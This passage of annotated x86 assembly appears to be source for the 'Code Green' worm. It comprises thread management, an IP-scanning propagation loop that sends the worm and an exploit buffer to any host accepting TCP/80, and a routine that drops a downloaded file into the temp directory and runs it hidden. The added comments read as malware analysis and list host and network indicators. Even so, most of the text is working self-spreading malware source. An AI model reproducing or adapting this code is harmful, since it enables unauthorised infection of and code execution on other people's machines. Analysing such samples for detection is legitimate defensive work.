push 0 ;dwCreationFlags [0: run immediately]
push ebp ;lpParameter
lea eax, [ebp][RandomGenerator]
push eax ;lpStartAddress
push 0 ;dwStackSize [0: default size]
push 0 ;lpThreadAttrib [0: defaulte secdescriptor]
call [ebp][ProcTable+API_CreateThread] ;RetVal: hThread
pop eax
;-----------------------------------------------------------------------
; Initialise_Critical_Sections (part of the main entry, which starts
; before this view). Creates the two locks shared with the worker threads:
;   CritSec_GetIP  - guards the shared CurrentIP scan position
;   CritSec_SendCG - serialises the blocking send() of the payload
; Both are destroyed again in _Delete_Critical_Sections.
;-----------------------------------------------------------------------
Initialise_Critical_Sections:
lea eax, [ebp][CritSec_GetIP] ;lpCriticalSection (delta-offset addressing via ebp)
push eax
call [ebp][ProcTable+API_InitializeCriticalSection]
lea eax, [ebp][CritSec_SendCG] ;lpCriticalSection
push eax
call [ebp][ProcTable+API_InitializeCriticalSection]
;-----------------------------------------------------------------------
; Propagation_ThreadLoop. Spawns one _ThreadFunction worker per iteration,
; passing ebp (the delta base) as lpParameter, then sleeps 100 ms and
; repeats while NrOfThreads < MAX_NR_OF_THREADS. NrOfThreads is not
; incremented here but by each worker on its own entry (_ThreadFunction),
; so the count lags thread creation by the thread start-up latency.
;-----------------------------------------------------------------------
Propagation_ThreadLoop:
push 0 ;DWORD slot that receives the thread id
push esp ;lpThreadId -> the slot just pushed
push 0 ;dwCreationFlags [0: run immediately]
push ebp ;lpParameter (delta base handed to the worker)
lea eax, [ebp][_ThreadFunction]
push eax ;lpStartAddress
push 0 ;dwStackSize [0: default size]
push 0 ;lpThreadAttrib [0: default security descriptor]
call [ebp][ProcTable+API_CreateThread] ;RetVal: hThread (not checked, handle is never closed)
pop eax ;discard the thread-id slot
push 100 ;dwMilliseconds
call [ebp][ProcTable+API_Sleep]
cmp [ebp][NrOfThreads], word ptr MAX_NR_OF_THREADS ;16-bit counter, signed compare (jl)
jl Propagation_ThreadLoop
;**********************************************************************************
;*** apply patch ***
;**********************************************************************************
;-----------------------------------------------------------------------
; _ExecutePatchFile. Host-side indicator: unless DLError > 1 (errors 2 and
; 3 per the original comment), the downloaded buffer at MemPointer
; (LenPatchFile bytes) is written to a file named PatchFileName in the
; temp directory and executed by WriteFileToTempDirAndExecuteIt.
; In either case the download buffer is then released with VirtualFree.
;-----------------------------------------------------------------------
_ExecutePatchFile:
cmp [ebp][DLError], byte ptr 1
jg _DoNotPatch_FreeMemory ;Jmp On Error 2 and 3
mov ebx, [ebp][LenPatchFile] ;EBX = file size
lea esi, [ebp][PatchFileName] ;ESI -> file name to create in the temp dir
mov edi, [ebp][MemPointer] ;EDI -> bytes to write
call WriteFileToTempDirAndExecuteIt ;EBX:FileSize ;ESI->TempFileName("Temp.exe") ;EDI->Buffer2Write
_DoNotPatch_FreeMemory:
push MEM_RELEASE ;dwFreeType
push 0 ;0070000h ;ca. 450kb ;dwSize must be 0 with MEM_RELEASE
push [ebp][MemPointer] ;lpAddress
call [ebp][ProcTable+API_VirtualFree]
;**********************************************************************************
;*** code green epilogue ***
;**********************************************************************************
;-----------------------------------------------------------------------
; _Epilogue - main thread's lifetime after the workers are running.
; Timeline (analysis): 6 x Sleep(20 min) = 2 h. After each 20-min sleep
; CurrentIP is zeroed under CritSec_GetIP, which forces every worker back
; to random target generation. After 2 h EndThreadsFlag is set, the main
; thread waits 5 s for the workers to notice it, unwinds the dwords that
; were pushed while the in-memory copy at ptrNewCodeGreen was built
; (count stored in its first dword, see the send path in _ThreadFunction),
; deletes the critical sections and then sleeps forever (31 days per call).
; The process never exits on its own.
;-----------------------------------------------------------------------
_Epilogue:
mov ecx, 6 ;6 rounds of 20 minutes
Main_WaitLoop:
push ecx ;preserve the loop counter across the API calls
push 1200000 ;20 mins
call [ebp][ProcTable+API_Sleep]
Main_StartRandomIPSearchAgain:
lea edx, [ebp][CritSec_GetIP] ;EnterCriticalSection
push edx
call [ebp][ProcTable+API_EnterCriticalSection]
mov [ebp][CurrentIP], dword ptr 0 ;CurrentIP = 0 => workers switch back to random IPs
lea edx, [ebp][CritSec_GetIP] ;LeaveCriticalSection
push edx
call [ebp][ProcTable+API_LeaveCriticalSection]
pop ecx ;restore the loop counter
loop Main_WaitLoop
_End_Main:
_End_Main_SetEndThreadsFlag:
mov [ebp][EndThreadsFlag], byte ptr 1 ;tells _ThreadFunction and RandomGenerator to finish
push 5000 ;5 s grace period for the threads
call [ebp][ProcTable+API_Sleep]
_BuildCodeGreen_DestroyStack:
mov eax, [ebp][ptrNewCodeGreen]
mov ecx, [eax] ;first dword of the block = number of pushes made when it was built
inc ecx ;plus one for the count dword itself (presumed)
DestroyStackLoop:
pop eax ;discard ecx dwords
loop DestroyStackLoop
_Delete_Critical_Sections:
lea eax, [ebp][CritSec_GetIP]
push eax
call [ebp][ProcTable+API_DeleteCriticalSection]
lea eax, [ebp][CritSec_SendCG] ;the send guard is deleted as well
push eax
call [ebp][ProcTable+API_DeleteCriticalSection]
_EndCodeGreenExecution_InfiniteLoop:
push 2678400000 ;31 days in ms; repeated forever, the thread never returns
call [ebp][ProcTable+API_Sleep]
jmp _EndCodeGreenExecution_InfiniteLoop
;**********************************************************************************
;*** propagation thread ***
;**********************************************************************************
;-----------------------------------------------------------------------
; _ThreadFunction - propagation worker (stdcall thread procedure, 1 arg)
; In:    [esp+4] = lpParameter = the delta base, loaded into ebp
; Stack: 72 zeroed dwords of scratch addressed through ebx:
;        [ebx]     target IP, a.b.c.d held in eax as 0AABBCCDDh
;        [ebx+4]   socket descriptor
;        [ebx+8]   ioctlsocket FIONBIO argument
;        [ebx+12]  sockaddr_in (16 bytes)
;        [ebx+28]  fd_set { count = 1, socket }
; Behaviour (analysis notes): a target is taken either sequentially from
; the shared CurrentIP (guarded by CritSec_GetIP) or from the shared
; RandVal seed that RandomGenerator keeps stirring; 127.x.x.x and
; addresses >= 224.0.0.0 are rejected. A non-blocking TCP connect to
; port 80 is attempted and select() waits for writability up to
; SelectTimeVal. Whenever the connect completes, the CGExploitLen+CGLen
; bytes at ptrNewCodeGreen+4 are sent under CritSec_SendCG - the only
; "vulnerability" test is that TCP/80 accepts; nothing is ever received
; from the peer. The loop ends when EndThreadsFlag == 1.
; Network indicator: bursts of short-lived connections to TCP/80 on
; random or consecutive addresses, each followed by one send().
;-----------------------------------------------------------------------
_ThreadFunction:
mov ebp, [esp+4] ;ebp = delta base passed as lpParameter
inc word ptr [ebp][NrOfThreads] ;counted here, read by Propagation_ThreadLoop
ThreadInitialisation:
mov ecx, 72
ThreadInit_Loop: ;reserve 72 zeroed dwords (288 bytes) of scratch on the stack
push 0
loop ThreadInit_Loop
mov ebx, esp ;EBX -> TempStackMem (scratch base, see layout above)
ThreadLoop:
cmp [ebp][EndThreadsFlag], byte ptr 1
je ThreadCleanup ;end thread
cmp [ebp][CurrentIP], 0
jne ThreadLoop_GetCurrentIP ;CurrentIP != 0 => sequential scan in progress
ThreadLoop_GenerateRandomIP:
xor [ebp][RandVal], esp ;stir the shared seed with this thread's stack pointer
mov eax, [ebp][RandVal] ;eax = candidate IP
jmp ThreadLoop_VerifyIP
ThreadLoop_GetCurrentIP:
lea edx, [ebp][CritSec_GetIP] ;EnterCriticalSection
push edx
call [ebp][ProcTable+API_EnterCriticalSection]
inc dword ptr [ebp][CurrentIP] ;GetCurrentIP: next consecutive address
mov eax, [ebp][CurrentIP] ;eax: CurrentIP
push eax ;keep eax across LeaveCriticalSection
lea edx, [ebp][CritSec_GetIP] ;LeaveCriticalSection
push edx
call [ebp][ProcTable+API_LeaveCriticalSection]
pop eax
ThreadLoop_VerifyIP:
mov edx, eax
and edx, 7F000001h ;7FFFFFFDh ;for debug purposes - addresses matching this mask skip the filters below
cmp edx, 7F000001h ;7FFFFFFDh ;for debug purposes
je ThreadLoop_ConnectToIP ;accept this IP
mov edx, eax
and edx, 7F000000h ;127.x.x.x (top byte of eax = first octet)
cmp edx, 7F000000h
je ThreadLoop_ResetIP
mov edx, eax
and edx, 0E0000000h ;224.x.x.x - top three bits set, i.e. 224.0.0.0 and above
cmp edx, 0E0000000h
je ThreadLoop_ResetIP
jmp ThreadLoop_ConnectToIP
ThreadLoop_ResetIP:
lea edx, [ebp][CritSec_GetIP] ;EnterCriticalSection
push edx
call [ebp][ProcTable+API_EnterCriticalSection]
mov [ebp][CurrentIP], 0 ;ResetCurrentIP => random generation
lea edx, [ebp][CritSec_GetIP] ;LeaveCriticalSection
push edx
call [ebp][ProcTable+API_LeaveCriticalSection]
jmp ThreadLoop
ThreadLoop_ConnectToIP:
mov [ebx], eax ;[ebx]:CurrentIP
push IPPROTO_TCP
push SOCK_STREAM
push AF_INET
call [ebp][ProcTable+API_socket]
mov dword ptr [ebx+4], eax ;[ebx+4]: socket descriptor (not checked for INVALID_SOCKET)
lea edi, [ebx+8] ;[ebx+8]: ioctlsocket_Arg
mov [edi], dword ptr 1 ;nonblocking
push edi ;pointer to the option value ([ptrArg]: 0=BlockingMode 1=NonblockingMode)
push FIONBIO
push [ebx+4] ;SocketDescriptor
call [ebp][ProcTable+API_ioctlsocket]
lea edi, [ebx+12] ;[ebx+12]: sockaddr_in
mov [edi], dword ptr 50000002h ;sin_family=2 (AF_INET), sin_port bytes 00 50 = port 80 in network order
mov eax, [ebx] ;eax:CurrentIP
mov [edi+7], al ;sin_addr stored big-endian: [edi+4..7] = a,b,c,d
mov [edi+6], ah
ror eax, 16
mov [edi+5], al
mov [edi+4], ah
mov [edi+8], dword ptr 0 ;sin_zero
mov [edi+12], dword ptr 0
push 16 ;NameLen
push edi ;ptrSockAddr
push [ebx+4]
call [ebp][ProcTable+API_connect] ;non-blocking: returns at once, completion observed via select
lea edi, [ebp][SelectTimeVal]
push edi ;lpTimeVal (timeout)
push 0 ;exceptfds: none (stdcall pushes right to left)
lea edi, [ebx+28] ;[ebx+28]: fd_set
mov [edi], dword ptr 1 ;fd_count = 1
mov eax, [ebx+4]
mov [edi+4], eax ;fd_array[0] = socket
push edi ;writefds: connect completion shows up as writability
push 0 ;readfds: none
push 0 ;nfds: ignored on Winsock
call [ebp][ProcTable+API_select]
cmp eax, SOCKET_ERROR
je ThreadLoop_CloseSocket ;ERROR
or eax, eax
jz ThreadLoop_CloseSocket ;timeval expired
ThreadLoop_VulnerableHostFound:
cmp [ebp][CurrentIP], 0
jne ThreadLoop_SendCodeGreen ;sequential scan already running: keep it
cmp eax, 7FFFFFFDh ;eax is select()'s return count here; presumably a leftover of the debug-address check
je ThreadLoop_SendCodeGreen
mov eax, [ebx]
mov [ebp][CurrentIP], eax ;eax: CurrentIP - start a sequential scan from the host that accepted
ThreadLoop_SendCodeGreen:
lea edi, [ebx+8]
mov [edi], dword ptr 0 ;blocking
push edi ;ptrArg
push FIONBIO
push [ebx+4]
call [ebp][ProcTable+API_ioctlsocket]
;If a connected socket can't send CodeGreen and blocks, all other threads will block too.
lea edx, [ebp][CritSec_SendCG] ;Enter Critical Section
push edx
call [ebp][ProcTable+API_EnterCriticalSection]
push 0 ;flags
push CGExploitLen + CGLen ;CGMsgLen
mov edi, [ebp][ptrNewCodeGreen]
add edi, 4 ;first DD holds NrOfPushs
push edi ;ptrBuf
push [ebx+4] ;socket
call [ebp][ProcTable+API_send] ;return value not checked
lea edx, [ebp][CritSec_SendCG] ;Leave Critical Section
push edx
call [ebp][ProcTable+API_LeaveCriticalSection]
ThreadLoop_CloseSocket:
push [ebx+4]
call [ebp][ProcTable+API_closesocket]
jmp ThreadLoop
ThreadCleanup:
mov ecx, 72 ;release the 72 scratch dwords pushed in ThreadInit_Loop
ThreadCleanup_Loop:
pop eax
loop ThreadCleanup_Loop
ret 4 ;stdcall: drop lpParameter
;**********************************************************************************
;*** functions ***
;**********************************************************************************
;-----------------------------------------------------------------------
; SearchMZHeader - walk down in 64 KiB steps until a word "MZ" is found.
; In:    esi = an address inside the module to locate
; Out:   esi -> the 64 KiB-aligned address holding "MZ" (DOS header)
; Clobb: ax, flags
; Note:  the low 16 bits are cleared and 10000h subtracted before the
;        first probe, so the page containing esi itself is not tested;
;        the loop has no lower bound and relies on the header being hit.
;-----------------------------------------------------------------------
SearchMZHeader: ;esi: Addr
xor si, si ;align down to 64 KiB
sub esi, 00010000h ;step one 64 KiB page down
mov ax, [esi]
cmp ax, "ZM" ;bytes 'M','Z' read as a little-endian word
jne SearchMZHeader
ret
;-----------------------------------------------------------------------
; DetermineStringLength - strlen for a NUL-terminated string.
; In:    esi -> string
; Out:   ecx = length excluding the terminator (all other regs preserved)
; The result is written into the ECX slot of the pushad frame
; ([esp+24]: EDI,ESI,EBP,ESP,EBX,EDX,ECX,EAX from low to high) so that
; popad returns it in ecx.
;-----------------------------------------------------------------------
DetermineStringLength: ;esi -> String ;RetVal: ECX:LenStr
pushad
mov edi, esi
xor eax, eax ;al = 0 = byte to scan for
xor ecx, ecx
dec ecx ;ecx = -1: effectively unbounded scan
repne scasb ;edi ends one past the NUL
dec edi
sub edi, esi ;edi = length
mov [esp+24], edi ;saved ECX of the pushad frame
popad
ret
;-----------------------------------------------------------------------
; FindUrlTableEntry - select the bh-th NUL-terminated string of a table.
; In:    esi -> table of consecutive NUL-terminated strings
;        bh  = 1-based entry number (LangID, 1..31 per original comment)
; Out:   esi -> start of entry bh (all other regs preserved)
; Skips bh-1 terminators with repne scasb; the result is written into the
; ESI slot of the pushad frame ([esp+4]) so popad returns it in esi.
;-----------------------------------------------------------------------
FindUrlTableEntry: ;esi -> UrlTable ;bh: LangID[1..31] ;RetVal: ESI -> correct table-entry
pushad
mov edi, esi
xor ecx, ecx
mov cl, bh
dec cl ;number of entries to skip
jcxz EntryInUrlTableFound ;entry 1: no skipping needed
xor eax, eax ;al = 0 = terminator to scan for
FindUrlTableEntry_SearchZeroLoop:
push ecx ;preserve the entry counter across the scan
xor ecx, ecx
dec ecx ;unbounded scan length
repne scasb ;edi -> byte after the next NUL
pop ecx
loop FindUrlTableEntry_SearchZeroLoop
EntryInUrlTableFound:
mov [esp+4], edi ;saved ESI of the pushad frame
popad
ret
;-----------------------------------------------------------------------
; RandomGenerator - seed-stirring thread (stdcall thread procedure, 1 arg)
; In:    [esp+4] = lpParameter = the delta base, loaded into ebp
; Loop:  reads the system time into CurrentSystemTime, folds the
;        wSecond/wMilliseconds words (SYSTEMTIME offset 12) rotated by
;        (wMilliseconds & 15) bits into the shared RandVal, sleeps 0..15 ms
;        and repeats until EndThreadsFlag == 1. RandVal is consumed by the
;        workers in _ThreadFunction as the random target address.
;-----------------------------------------------------------------------
RandomGenerator: ;Thread
mov ebp, [esp+4] ;ebp = delta base passed as lpParameter
lea esi, [ebp][CurrentSystemTime]
push esi ;lpSystemTime
call [ebp][ProcTable+API_GetSystemTime]
mov eax, [esi+12] ;wSecond | wMilliseconds << 16
xor ecx, ecx
mov cl, [esi+14] ;low byte of wMilliseconds
and cl, 00001111b ;ror by max 15 bits
ror eax, cl
xor eax, [ebp][RandVal] ;stir into the shared seed
mov [ebp][RandVal], eax
xor edx, edx
mov dl, al
and dl, 00001111b ;sleep 0..15 ms
push edx ;dwMilliseconds
call [ebp][ProcTable+API_Sleep]
cmp [ebp][EndThreadsFlag], byte ptr 1
jne RandomGenerator ;re-entering the label re-reads ebp from [esp+4], which is unchanged
ret 4 ;stdcall: drop lpParameter
;-----------------------------------------------------------------------
; WriteFileToTempDirAndExecuteIt - drop a buffer to %TEMP%\<name> and run it
; In:    ebx = number of bytes to write
;        esi -> NUL-terminated file name appended to the temp path
;        edi -> bytes to write
; Stack: 256 zeroed dwords (1024 bytes) used as the path buffer; the
;        original edi is pushed on top and retrieved as ecx after CreateFile.
; Flow:  GetTempPathA -> append name -> CreateFileA(CREATE_ALWAYS) ->
;        WriteFile -> CloseHandle -> WinExec(path, 0 = SW_HIDE).
;        Any error jumps to ExecuteFile_ERROR; WinExec's result is ignored
;        (the check is commented out). No return value.
; Host indicator: a file created in the user's temp directory and started
; with a hidden window; the name comes from PatchFileName ("Temp.exe"
; according to the caller's comment).
; Clobb: eax, ecx, edx, edi, flags
;-----------------------------------------------------------------------
WriteFileToTempDirAndExecuteIt: ;EBX:FileSize ;ESI->TempFileName("Temp.exe") ;EDI->Buffer2Write
ExecuteFile_InitStack:
mov ecx, 256
InitStackLoop: ;1024 zeroed bytes of path buffer
push 0
loop InitStackLoop
push edi ;save Buffer2Write on top of the path buffer
mov edi, esp
add edi, 4 ;EDI -> path buffer (skip the saved Buffer2Write)
GetTempPathName:
push edi ;lpBuf
push 1010 ;dwBufLen (leaves room below the 1024-byte buffer)
call [ebp][ProcTable+API_GetTempPath] ;GetTempPathA ;eax = length of the path written
AddFileNameToTempPath:
pushad
add edi, eax ;EDI -> end of the temp path
call DetermineStringLength ;ecx = strlen(esi)
inc ecx ;plus zero at EndOfString
rep movsb ;append the file name including its NUL
popad ;EDI -> FILENAME
CreateTempFile:
push 0 ;hTemplateFile
push FILE_ATTRIBUTE_NORMAL ;dwFlagsAndAttributes
push CREATE_ALWAYS ;dwCreationDisposition (overwrites an existing file)
push 0 ;lpSecurityAttributes
push 0 ;dwShareMode
push GENERIC_READ or GENERIC_WRITE ;dwDesiredAccess
push edi ;lpFileName
call [ebp][ProcTable+API_CreateFile]
pop ecx ;ECX -> Buffer2Write
cmp eax, INVALID_HANDLE_VALUE
je ExecuteFile_ERROR
WriteToTempFile:
push eax ;keep hFile for CloseHandle
push 0 ;DWORD slot for lpNrOfBytesWritten
mov edx, esp
push 0 ;lpOverlapped
push edx ;lpNrOfBytesWritten
push ebx ;dwNrOfBytes2Write
push ecx ;lpBuffer
push eax ;hFile
call [ebp][ProcTable+API_WriteFile] ;WriteFile
cmp eax, TRUE ;ZF = success; bytes written are not compared against ebx
pop eax ;discard the bytes-written slot
pop eax ;eax = hFile
pushfd ;preserve the WriteFile result flags across CloseHandle
CloseFileHandle:
push eax
call [ebp][ProcTable+API_CloseHandle]
popfd
jne ExecuteFile_ERROR
ExecutePatchFile:
push eax ;scratch slot, balanced by the pop below
push 0 ;uCmdShow = 0 (SW_HIDE)
push edi ;----^---- EDI->FileName (lpCmdLine)
call [ebp][ProcTable+API_WinExec]
;cmp eax, 31
pop eax
;jg ERROR
ExecuteFile_ERROR:
ExecuteFile_DestroyStack:
mov ecx, 256 ;release the path buffer (all intermediate pushes are already popped)
ExecuteFile_DestroyStackLoop:
pop eax
loop ExecuteFile_DestroyStackLoop
ret
;**********************************************************************************
;*** includes ***
;**********************************************************************************
INCLUDE CodeGreen_Variablen.INC
CGEnd EQU $
END _Entry